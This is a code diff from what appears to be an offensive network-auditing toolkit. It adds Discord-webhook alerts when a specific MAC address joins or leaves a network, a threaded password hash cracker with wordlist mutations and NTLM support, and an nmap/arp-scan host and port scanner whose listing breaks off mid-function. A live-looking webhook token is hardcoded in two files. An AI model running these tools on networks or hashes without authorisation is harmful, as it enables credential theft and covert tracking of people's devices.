parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
|
||||
default=b_args['protocol']['default'])
|
||||
parser.add_argument('--verbose', action='store_true')
|
||||
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
# Your action logic here
|
||||
print(f"Starting action with target: {args.target}")
|
||||
# ...
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
"""
|
||||
82
resources/default_config/actions/presence_join.py
Normal file
@@ -0,0 +1,82 @@
|
||||
# actions/presence_join.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
|
||||
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
import logging
|
||||
from datetime import datetime, timezone
|
||||
from logger import Logger
|
||||
from shared import SharedData # only if executed directly for testing
|
||||
|
||||
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
|
||||
|
||||
# --- Metadata (truth is in DB; here for reference/consistency) --------------
|
||||
b_class = "PresenceJoin"
|
||||
b_module = "presence_join"
|
||||
b_status = "PresenceJoin"
|
||||
b_port = None
|
||||
b_service = None
|
||||
b_parent = None
|
||||
b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_join only fires on join transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
|
||||
# Replace with your webhook
|
||||
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
|
||||
|
||||
class PresenceJoin:
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
def _send(self, text: str) -> None:
|
||||
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
|
||||
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
|
||||
return
|
||||
try:
|
||||
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
|
||||
if r.status_code < 300:
|
||||
logger.info("PresenceJoin: webhook sent.")
|
||||
else:
|
||||
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
|
||||
except Exception as e:
|
||||
logger.error(f"PresenceJoin: webhook error: {e}")
|
||||
|
||||
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
|
||||
"""
|
||||
Called by the orchestrator when the scheduler detected the join.
|
||||
ip/port = host targets (if known), row = host info.
|
||||
"""
|
||||
try:
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
name = f"{host} ({mac})" if host else mac
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
msg = f"✅ **Presence detected**\n"
|
||||
msg += f"- Host: {host or 'unknown'}\n"
|
||||
msg += f"- MAC: {mac}\n"
|
||||
if ip_s:
|
||||
msg += f"- IP: {ip_s}\n"
|
||||
msg += f"- Time: {timestamp}"
|
||||
|
||||
self._send(msg)
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"PresenceJoin error: {e}")
|
||||
return "failed"
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sd = SharedData()
|
||||
logger.info("PresenceJoin ready (direct mode).")
|
||||
81
resources/default_config/actions/presence_left.py
Normal file
@@ -0,0 +1,81 @@
|
||||
# actions/presence_left.py
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
|
||||
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
|
||||
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
|
||||
- The action does not query anything: it only notifies when called.
|
||||
"""
|
||||
|
||||
import requests
|
||||
from typing import Optional
|
||||
import logging
|
||||
from datetime import datetime, timezone
|
||||
from logger import Logger
|
||||
from shared import SharedData # only if executed directly for testing
|
||||
|
||||
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
|
||||
|
||||
# --- Metadata (truth is in DB; here for reference/consistency) --------------
|
||||
b_class = "PresenceLeave"
|
||||
b_module = "presence_left"
|
||||
b_status = "PresenceLeave"
|
||||
b_port = None
|
||||
b_service = None
|
||||
b_parent = None
|
||||
b_priority = 90
|
||||
b_cooldown = 0 # not needed: on_leave only fires on leave transition
|
||||
b_rate_limit = None
|
||||
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
|
||||
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
|
||||
|
||||
# Replace with your webhook (can reuse the same as PresenceJoin)
|
||||
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
|
||||
|
||||
class PresenceLeave:
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
def _send(self, text: str) -> None:
|
||||
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
|
||||
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
|
||||
return
|
||||
try:
|
||||
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
|
||||
if r.status_code < 300:
|
||||
logger.info("PresenceLeave: webhook sent.")
|
||||
else:
|
||||
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
|
||||
except Exception as e:
|
||||
logger.error(f"PresenceLeave: webhook error: {e}")
|
||||
|
||||
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
|
||||
"""
|
||||
Called by the orchestrator when the scheduler detected the disconnection.
|
||||
ip/port = last known target (if available), row = host info.
|
||||
"""
|
||||
try:
|
||||
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
|
||||
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
|
||||
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
|
||||
|
||||
# Add timestamp in UTC
|
||||
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
msg = f"❌ **Presence lost**\n"
|
||||
msg += f"- Host: {host or 'unknown'}\n"
|
||||
msg += f"- MAC: {mac}\n"
|
||||
if ip_s:
|
||||
msg += f"- Last IP: {ip_s}\n"
|
||||
msg += f"- Time: {timestamp}"
|
||||
|
||||
self._send(msg)
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"PresenceLeave error: {e}")
|
||||
return "failed"
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sd = SharedData()
|
||||
logger.info("PresenceLeave ready (direct mode).")
|
||||
265
resources/default_config/actions/rune_cracker.py
Normal file
@@ -0,0 +1,265 @@
|
||||
# Advanced password cracker supporting multiple hash formats and attack methods.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -i, --input Input file containing hashes to crack.
|
||||
# -w, --wordlist Path to password wordlist (default: built-in list).
|
||||
# -r, --rules Path to rules file for mutations (default: built-in rules).
|
||||
# -t, --type Hash type (md5, sha1, sha256, sha512, ntlm).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/hashes).
|
||||
|
||||
import os
|
||||
import json
|
||||
import hashlib
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import threading
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
import itertools
|
||||
import re
|
||||
|
||||
|
||||
b_class = "RuneCracker"
|
||||
b_module = "rune_cracker"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json")
|
||||
|
||||
# Supported hash types and their patterns
|
||||
HASH_PATTERNS = {
|
||||
'md5': r'^[a-fA-F0-9]{32}$',
|
||||
'sha1': r'^[a-fA-F0-9]{40}$',
|
||||
'sha256': r'^[a-fA-F0-9]{64}$',
|
||||
'sha512': r'^[a-fA-F0-9]{128}$',
|
||||
'ntlm': r'^[a-fA-F0-9]{32}$'
|
||||
}
|
||||
|
||||
class RuneCracker:
|
||||
def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR):
|
||||
self.input_file = input_file
|
||||
self.wordlist = wordlist
|
||||
self.rules = rules
|
||||
self.hash_type = hash_type
|
||||
self.output_dir = output_dir
|
||||
|
||||
self.hashes = set()
|
||||
self.cracked = {}
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# Load mutation rules
|
||||
self.mutation_rules = self.load_rules()
|
||||
|
||||
def load_hashes(self):
|
||||
"""Load hashes from input file and validate format."""
|
||||
try:
|
||||
with open(self.input_file, 'r') as f:
|
||||
for line in f:
|
||||
hash_value = line.strip()
|
||||
if self.hash_type:
|
||||
if re.match(HASH_PATTERNS[self.hash_type], hash_value):
|
||||
self.hashes.add(hash_value)
|
||||
else:
|
||||
# Try to auto-detect hash type
|
||||
for h_type, pattern in HASH_PATTERNS.items():
|
||||
if re.match(pattern, hash_value):
|
||||
self.hashes.add(hash_value)
|
||||
break
|
||||
|
||||
logging.info(f"Loaded {len(self.hashes)} valid hashes")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error loading hashes: {e}")
|
||||
|
||||
def load_wordlist(self):
|
||||
"""Load password wordlist."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
with open(self.wordlist, 'r', errors='ignore') as f:
|
||||
return [line.strip() for line in f if line.strip()]
|
||||
return ['password', 'admin', '123456', 'qwerty', 'letmein']
|
||||
|
||||
def load_rules(self):
|
||||
"""Load mutation rules."""
|
||||
if self.rules and os.path.exists(self.rules):
|
||||
with open(self.rules, 'r') as f:
|
||||
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
|
||||
return [
|
||||
'capitalize',
|
||||
'lowercase',
|
||||
'uppercase',
|
||||
'l33t',
|
||||
'append_numbers',
|
||||
'prepend_numbers',
|
||||
'toggle_case'
|
||||
]
|
||||
|
||||
def apply_mutations(self, word):
|
||||
"""Apply various mutation rules to a word."""
|
||||
mutations = set([word])
|
||||
|
||||
for rule in self.mutation_rules:
|
||||
if rule == 'capitalize':
|
||||
mutations.add(word.capitalize())
|
||||
elif rule == 'lowercase':
|
||||
mutations.add(word.lower())
|
||||
elif rule == 'uppercase':
|
||||
mutations.add(word.upper())
|
||||
elif rule == 'l33t':
|
||||
mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
|
||||
.replace('o', '0').replace('s', '5'))
|
||||
elif rule == 'append_numbers':
|
||||
mutations.update(word + str(n) for n in range(100))
|
||||
elif rule == 'prepend_numbers':
|
||||
mutations.update(str(n) + word for n in range(100))
|
||||
elif rule == 'toggle_case':
|
||||
mutations.add(''.join(c.upper() if i % 2 else c.lower()
|
||||
for i, c in enumerate(word)))
|
||||
|
||||
return mutations
|
||||
|
||||
def hash_password(self, password, hash_type):
|
||||
"""Generate hash for a password using specified algorithm."""
|
||||
if hash_type == 'md5':
|
||||
return hashlib.md5(password.encode()).hexdigest()
|
||||
elif hash_type == 'sha1':
|
||||
return hashlib.sha1(password.encode()).hexdigest()
|
||||
elif hash_type == 'sha256':
|
||||
return hashlib.sha256(password.encode()).hexdigest()
|
||||
elif hash_type == 'sha512':
|
||||
return hashlib.sha512(password.encode()).hexdigest()
|
||||
elif hash_type == 'ntlm':
|
||||
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
|
||||
|
||||
return None
|
||||
|
||||
def crack_password(self, password):
|
||||
"""Attempt to crack hashes using a single password and its mutations."""
|
||||
try:
|
||||
mutations = self.apply_mutations(password)
|
||||
|
||||
for mutation in mutations:
|
||||
for hash_type in HASH_PATTERNS.keys():
|
||||
if not self.hash_type or self.hash_type == hash_type:
|
||||
hash_value = self.hash_password(mutation, hash_type)
|
||||
|
||||
if hash_value in self.hashes:
|
||||
with self.lock:
|
||||
self.cracked[hash_value] = {
|
||||
'password': mutation,
|
||||
'hash_type': hash_type,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
}
|
||||
logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error cracking with password {password}: {e}")
|
||||
|
||||
def save_results(self):
|
||||
"""Save cracked passwords to JSON file."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
results = {
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'total_hashes': len(self.hashes),
|
||||
'cracked_count': len(self.cracked),
|
||||
'cracked_hashes': self.cracked
|
||||
}
|
||||
|
||||
output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump(results, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the password cracking process."""
|
||||
try:
|
||||
logging.info("Starting password cracking process")
|
||||
self.load_hashes()
|
||||
|
||||
if not self.hashes:
|
||||
logging.error("No valid hashes loaded")
|
||||
return
|
||||
|
||||
wordlist = self.load_wordlist()
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
executor.map(self.crack_password, wordlist)
|
||||
|
||||
self.save_results()
|
||||
|
||||
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error during execution: {e}")
|
||||
|
||||
def save_settings(input_file, wordlist, rules, hash_type, output_dir):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"input_file": input_file,
|
||||
"wordlist": wordlist,
|
||||
"rules": rules,
|
||||
"hash_type": hash_type,
|
||||
"output_dir": output_dir
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Advanced password cracker")
|
||||
parser.add_argument("-i", "--input", help="Input file containing hashes")
|
||||
parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
|
||||
parser.add_argument("-r", "--rules", help="Path to rules file")
|
||||
parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
input_file = args.input or settings.get("input_file")
|
||||
wordlist = args.wordlist or settings.get("wordlist")
|
||||
rules = args.rules or settings.get("rules")
|
||||
hash_type = args.type or settings.get("hash_type")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
|
||||
if not input_file:
|
||||
logging.error("Input file is required. Use -i or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(input_file, wordlist, rules, hash_type, output_dir)
|
||||
|
||||
cracker = RuneCracker(
|
||||
input_file=input_file,
|
||||
wordlist=wordlist,
|
||||
rules=rules,
|
||||
hash_type=hash_type,
|
||||
output_dir=output_dir
|
||||
)
|
||||
cracker.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
708
resources/default_config/actions/scanning.py
Normal file
@@ -0,0 +1,708 @@
|
||||
# scanning.py – Network scanner (DB-first, no stubs)
|
||||
# - Host discovery (nmap -sn -PR)
|
||||
# - Resolve MAC/hostname (per-host threads) -> DB (hosts table)
|
||||
# - Port scan (multi-threads) -> DB (merge ports by MAC)
|
||||
# - Mark alive=0 for hosts not seen this run
|
||||
# - Update stats (stats table)
|
||||
# - Light logging (milestones) without flooding
|
||||
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
|
||||
# - NEW: No DB insert without a real MAC. Unresolved IPs are kept in-memory for this run.
|
||||
|
||||
import os
|
||||
import threading
|
||||
import socket
|
||||
import time
|
||||
import logging
|
||||
import subprocess
|
||||
from datetime import datetime
|
||||
|
||||
import netifaces
|
||||
from getmac import get_mac_address as gma
|
||||
import ipaddress
|
||||
import nmap
|
||||
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="scanning.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "NetworkScanner"
|
||||
b_module = "scanning"
|
||||
b_status = "NetworkScanner"
|
||||
b_port = None
|
||||
b_parent = None
|
||||
b_priority = 1
|
||||
b_action = "global"
|
||||
b_trigger = "on_interval:180"
|
||||
b_requires = '{"max_concurrent": 1}'
|
||||
|
||||
|
||||
class NetworkScanner:
|
||||
"""
|
||||
Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
|
||||
Keeps the original fast logic: nmap discovery, per-host threads, per-port threads.
|
||||
NEW: no 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
|
||||
"""
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.logger = logger
|
||||
self.blacklistcheck = shared_data.blacklistcheck
|
||||
self.mac_scan_blacklist = set(shared_data.mac_scan_blacklist or [])
|
||||
self.ip_scan_blacklist = set(shared_data.ip_scan_blacklist or [])
|
||||
self.hostname_scan_blacklist = set(shared_data.hostname_scan_blacklist or [])
|
||||
self.lock = threading.Lock()
|
||||
self.nm = nmap.PortScanner()
|
||||
self.running = False
|
||||
self.scan_interface = None
|
||||
|
||||
# progress
|
||||
self.total_hosts = 0
|
||||
self.scanned_hosts = 0
|
||||
self.total_ports = 0
|
||||
self.scanned_ports = 0
|
||||
|
||||
# ---------- progress ----------
|
||||
def update_progress(self, phase, increment=1):
|
||||
with self.lock:
|
||||
if phase == 'host':
|
||||
self.scanned_hosts += increment
|
||||
host_part = (self.scanned_hosts / self.total_hosts) * 50 if self.total_hosts else 0
|
||||
total = host_part
|
||||
elif phase == 'port':
|
||||
self.scanned_ports += increment
|
||||
port_part = (self.scanned_ports / self.total_ports) * 50 if self.total_ports else 0
|
||||
total = 50 + port_part
|
||||
else:
|
||||
total = 0
|
||||
total = min(max(total, 0), 100)
|
||||
self.shared_data.bjorn_progress = f"{int(total)}%"
|
||||
|
||||
# ---------- network ----------
|
||||
def get_network(self):
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return None
|
||||
try:
|
||||
if self.shared_data.use_custom_network:
|
||||
net = ipaddress.ip_network(self.shared_data.custom_network, strict=False)
|
||||
self.logger.info(f"Using custom network: {net}")
|
||||
return net
|
||||
|
||||
interface = self.shared_data.default_network_interface
|
||||
if interface.startswith('bnep'):
|
||||
for alt in ['wlan0', 'eth0']:
|
||||
if alt in netifaces.interfaces():
|
||||
interface = alt
|
||||
self.logger.info(f"Switching from bnep* to {interface}")
|
||||
break
|
||||
|
||||
addrs = netifaces.ifaddresses(interface)
|
||||
ip_info = addrs.get(netifaces.AF_INET)
|
||||
if not ip_info:
|
||||
self.logger.error(f"No IPv4 address found for interface {interface}.")
|
||||
return None
|
||||
|
||||
ip_address = ip_info[0]['addr']
|
||||
netmask = ip_info[0]['netmask']
|
||||
network = ipaddress.IPv4Network(f"{ip_address}/{netmask}", strict=False)
|
||||
self.scan_interface = interface
|
||||
self.logger.info(f"Using network: {network} via {interface}")
|
||||
return network
|
||||
except Exception as e:
|
||||
self.logger.error(f"Error in get_network: {e}")
|
||||
return None
|
||||
|
||||
# ---------- vendor / essid ----------
|
||||
def load_mac_vendor_map(self):
|
||||
vendor_map = {}
|
||||
path = self.shared_data.nmap_prefixes_file
|
||||
if not path or not os.path.exists(path):
|
||||
self.logger.debug(f"nmap_prefixes not found at {path}")
|
||||
return vendor_map
|
||||
try:
|
||||
with open(path, 'r') as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if not line or line.startswith('#'):
|
||||
continue
|
||||
parts = line.split(None, 1)
|
||||
if len(parts) == 2:
|
||||
pref, vend = parts
|
||||
vendor_map[pref.strip().upper()] = vend.strip()
|
||||
except Exception as e:
|
||||
self.logger.error(f"load_mac_vendor_map error: {e}")
|
||||
return vendor_map
|
||||
|
||||
def mac_to_vendor(self, mac, vendor_map):
|
||||
if not mac or len(mac.split(':')) < 3:
|
||||
return ""
|
||||
pref = ''.join(mac.split(':')[:3]).upper()
|
||||
return vendor_map.get(pref, "")
|
||||
|
||||
def get_current_essid(self):
|
||||
try:
|
||||
essid = subprocess.check_output(['iwgetid', '-r'], stderr=subprocess.STDOUT, universal_newlines=True).strip()
|
||||
return essid or ""
|
||||
except Exception:
|
||||
return ""
|
||||
|
||||
# ---------- hostname / mac ----------
|
||||
def validate_hostname(self, ip, hostname):
|
||||
if not hostname:
|
||||
return ""
|
||||
try:
|
||||
infos = socket.getaddrinfo(hostname, None, family=socket.AF_INET)
|
||||
ips = {ai[4][0] for ai in infos}
|
||||
return hostname if ip in ips else ""
|
||||
except Exception:
|
||||
return ""
|
||||
|
||||
def get_mac_address(self, ip, hostname):
|
||||
"""
|
||||
Try multiple strategies to resolve a real MAC for the given IP.
|
||||
RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
|
||||
NEVER returns 'IP:<ip>'.
|
||||
"""
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
return None
|
||||
|
||||
import re
|
||||
|
||||
MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
|
||||
BAD_MACS = {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}
|
||||
|
||||
def _normalize_mac(s: str | None) -> str | None:
|
||||
if not s:
|
||||
return None
|
||||
m = MAC_RE.search(s)
|
||||
if not m:
|
||||
return None
|
||||
return m.group(0).replace('-', ':').lower()
|
||||
|
||||
def _is_bad_mac(mac: str | None) -> bool:
|
||||
if not mac:
|
||||
return True
|
||||
mac_l = mac.lower()
|
||||
if mac_l in BAD_MACS:
|
||||
return True
|
||||
parts = mac_l.split(':')
|
||||
if len(parts) == 6 and len(set(parts)) == 1:
|
||||
return True
|
||||
return False
|
||||
|
||||
try:
|
||||
mac = None
|
||||
|
||||
# 1) getmac (retry a few times)
|
||||
retries = 6
|
||||
while not mac and retries > 0 and not self.shared_data.orchestrator_should_exit:
|
||||
try:
|
||||
from getmac import get_mac_address as gma
|
||||
mac = _normalize_mac(gma(ip=ip))
|
||||
except Exception:
|
||||
mac = None
|
||||
if not mac:
|
||||
time.sleep(1.5)
|
||||
retries -= 1
|
||||
|
||||
# 2) targeted arp-scan
|
||||
if not mac:
|
||||
try:
|
||||
iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
|
||||
out = subprocess.check_output(
|
||||
['sudo', 'arp-scan', '--interface', iface, '-q', ip],
|
||||
universal_newlines=True, stderr=subprocess.STDOUT
|
||||
)
|
||||
for line in out.splitlines():
|
||||
if line.strip().startswith(ip):
|
||||
cand = _normalize_mac(line)
|
||||
if cand:
|
||||
mac = cand
|
||||
break
|
||||
if not mac:
|
||||
cand = _normalize_mac(out)
|
||||
if cand:
|
||||
mac = cand
|
||||
except Exception as e:
|
||||
self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")
|
||||
|
||||
# 3) ip neigh
|
||||
if not mac:
|
||||
try:
|
||||
neigh = subprocess.check_output(['ip', 'neigh', 'show', ip],
|
||||
universal_newlines=True, stderr=subprocess.STDOUT)
|
||||
cand = _normalize_mac(neigh)
|
||||
if cand:
|
||||
mac = cand
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 4) filter invalid/broadcast
|
||||
if _is_bad_mac(mac):
|
||||
mac = None
|
||||
|
||||
return mac
|
||||
|
||||
except Exception as e:
|
||||
self.logger.error(f"Error in get_mac_address: {e}")
|
||||
return None
|
||||
|
||||
# ---------- port scanning ----------
|
||||
class PortScannerWorker:
|
||||
def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
|
||||
self.outer = outer
|
||||
self.target = target
|
||||
self.open_ports = open_ports
|
||||
self.portstart = int(portstart)
|
||||
self.portend = int(portend)
|
||||
self.extra_ports = [int(p) for p in (extra_ports or [])]
|
||||
|
||||
def scan_one(self, port):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(2)
|
||||
try:
|
||||
s.connect((self.target, port))
|
||||
with self.outer.lock:
|
||||
self.open_ports.setdefault(self.target, []).append(port)
|
||||
except Exception:
|
||||
pass
|
||||
finally:
|
||||
try:
|
||||
s.close()
|
||||
except Exception:
|
||||
pass
|
||||
self.outer.update_progress('port', 1)
|
||||
|
||||
def run(self):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
threads = []
|
||||
for port in range(self.portstart, self.portend):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
t = threading.Thread(target=self.scan_one, args=(port,))
|
||||
t.start()
|
||||
threads.append(t)
|
||||
for port in self.extra_ports:
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
t = threading.Thread(target=self.scan_one, args=(port,))
|
||||
t.start()
|
||||
threads.append(t)
|
||||
for t in threads:
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
break
|
||||
t.join()
|
||||
|
||||
# ---------- main scan block ----------
|
||||
class ScanPorts:
|
||||
class IpData:
|
||||
def __init__(self):
|
||||
self.ip_list = []
|
||||
self.hostname_list = []
|
||||
self.mac_list = []
|
||||
|
||||
def __init__(self, outer, network, portstart, portend, extra_ports):
|
||||
self.outer = outer
|
||||
self.network = network
|
||||
self.portstart = int(portstart)
|
||||
self.portend = int(portend)
|
||||
self.extra_ports = [int(p) for p in (extra_ports or [])]
|
||||
self.ip_data = self.IpData()
|
||||
self.ip_hostname_list = [] # tuples (ip, hostname, mac)
|
||||
self.host_threads = []
|
||||
self.open_ports = {}
|
||||
self.all_ports = []
|
||||
|
||||
# NEW: per-run pending cache for unresolved IPs (no DB writes)
|
||||
# ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
|
||||
self.pending = {}
|
||||
|
||||
def scan_network_and_collect(self):
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
|
||||
t0 = time.time()
|
||||
self.outer.nm.scan(hosts=str(self.network), arguments='-sn -PR')
|
||||
hosts = list(self.outer.nm.all_hosts())
|
||||
if self.outer.blacklistcheck:
|
||||
hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]
|
||||
|
||||
self.outer.total_hosts = len(hosts)
|
||||
self.outer.scanned_hosts = 0
|
||||
self.outer.update_progress('host', 0)
|
||||
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")
|
||||
|
||||
# existing hosts (for quick merge)
|
||||
existing_rows = self.outer.shared_data.db.get_all_hosts()
|
||||
self.existing_map = {h['mac_address']: h for h in existing_rows}
|
||||
self.seen_now = set()
|
||||
|
||||
# vendor/essid
|
||||
self.vendor_map = self.outer.load_mac_vendor_map()
|
||||
self.essid = self.outer.get_current_essid()
|
||||
|
||||
# per-host threads
|
||||
for host in hosts:
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
t = threading.Thread(target=self.scan_host, args=(host,))
|
||||
t.start()
|
||||
self.host_threads.append(t)
|
||||
|
||||
# wait
|
||||
for t in self.host_threads:
|
||||
if self.outer.shared_data.orchestrator_should_exit:
|
||||
return
|
||||
t.join()
|
||||
|
||||
self.outer.logger.info(
|
||||
f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
|
||||
f"{len(self.ip_hostname_list)} MAC(s) found, {len(self.pending)} unresolved IP(s)"
|
||||
)
|
||||
|
||||
# mark unseen as alive=0
|
||||
existing_macs = set(self.existing_map.keys())
|
||||
for mac in existing_macs - self.seen_now:
|
||||
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
|
||||
|
||||
# feed ip_data
|
||||
for ip, hostname, mac in self.ip_hostname_list:
|
||||
